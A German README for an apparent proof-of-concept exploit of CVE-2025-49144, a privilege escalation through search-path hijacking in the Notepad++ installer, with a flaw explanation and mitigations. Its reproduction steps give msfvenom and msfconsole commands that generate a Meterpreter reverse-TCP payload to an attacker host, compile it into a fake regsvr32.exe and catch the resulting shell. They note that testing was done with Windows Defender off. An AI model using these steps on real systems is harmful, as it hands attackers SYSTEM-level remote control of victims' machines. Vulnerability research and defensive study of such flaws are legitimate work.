
CVE-2025-49144 PoC für Sicherheitsforscher zum Testen und Ausprobieren.

📌 CVE-2025-49144 ist eine lokale Privilegienausweitungsschwachstelle mit hohem Schweregrad, die in den Installationsprogrammen von Notepad++ v8.8.1 und früheren Versionen gefunden wurde. Diese Schwachstelle beruht auf unkontrolliertem Suchpfadverhalten für ausführbare Dateien während der Installation, wodurch ein lokaler Angreifer SYSTEM-Rechte erlangen kann, indem er schädliche ausführbare Dateien im selben Verzeichnis wie das Installationsprogramm platziert.
⚙️ Wie der CVE funktioniert – Schritt für Schritt:
🧱 1. Was ist im Installationsprogramm schiefgelaufen?
Das Notepad++-Installationsprogramm (vor v8.8.2) ruft regsvr32.exe auf, um einige Komponenten zu registrieren – tut dies aber ohne den vollständigen Pfad (wie C:\Windows\System32\regsvr32.exe).
Stattdessen führt es einfach aus:
regsvr32.exe some_dll
📂 2. Verhalten des Windows-Suchpfads: Wenn eine ausführbare Datei ohne vollständigen Pfad gestartet wird, verwendet Windows eine bestimmte Suchreihenfolge, um die Datei zu finden:
Wenn also eine gefälschte regsvr32.exe im selben Ordner wie das Installationsprogramm (z. B. Downloads) platziert wird, verwendet Windows diese vor der echten.
💣 3. Ausnutzung:
- Der Angreifer platziert eine schädliche regsvr32.exe im selben Ordner wie das legitime Notepad++-Installationsprogramm (z. B. im Downloads-Ordner des Opfers).
- Das Opfer führt das Installationsprogramm aus (denkt, es sei sicher).
- Das Installationsprogramm ruft regsvr32.exe auf, führt aber letztendlich die schädliche Datei aus demselben Ordner aus – mit SYSTEM-Rechten (da Installationsprogramme normalerweise Administratorberechtigungen anfordern).
- Die Nutzlast des Angreifers läuft nun als NT AUTHORITY\SYSTEM.
⚙️ Schritte zur Reproduktion:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=4444 -f c > shellcode.txt
x86_64-w64-mingw32-gcc regsvr32_loader.c -o regsvr32.exe -mwindows
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST X.X.X.X
set LPORT 4444
run
Hinweis: Dies ist ein PoC und wurde daher bei deaktiviertem Windows Defender und Echtzeitschutz getestet.
✅ Abhilfemaßnahmen
Benutzer und Administratoren sollten:
Upgrade auf Notepad++ v8.8.2 oder neuer
Softwareinstallation auf vertrauenswürdige Administratoren beschränken
Verwenden Sie AppLocker, WDAC oder Softwareeinschränkungsrichtlinien (SRP) zum:
Sicherheitsteams sollten regelmäßig Installationspfade prüfen, Schreibberechtigungen überwachen und das Verhalten während der Installationsausführung beobachten, um die Angriffsfläche zu reduzieren.
MIT-Lizenz — Nur für Bildungs-, Forschungs- und Verteidigungszwecke kostenlos.
Pull-Requests sind willkommen — verbessern Sie die Erkennung, fügen Sie Funktionen hinzu oder schlagen Sie Korrekturen vor.
Dieser PoC dient nur zu Bildungs- und Forschungszwecken. Verwenden Sie ihn auf eigenes Risiko. Der Autor übernimmt keine Verantwortung für Missbrauch oder verursachte Schäden.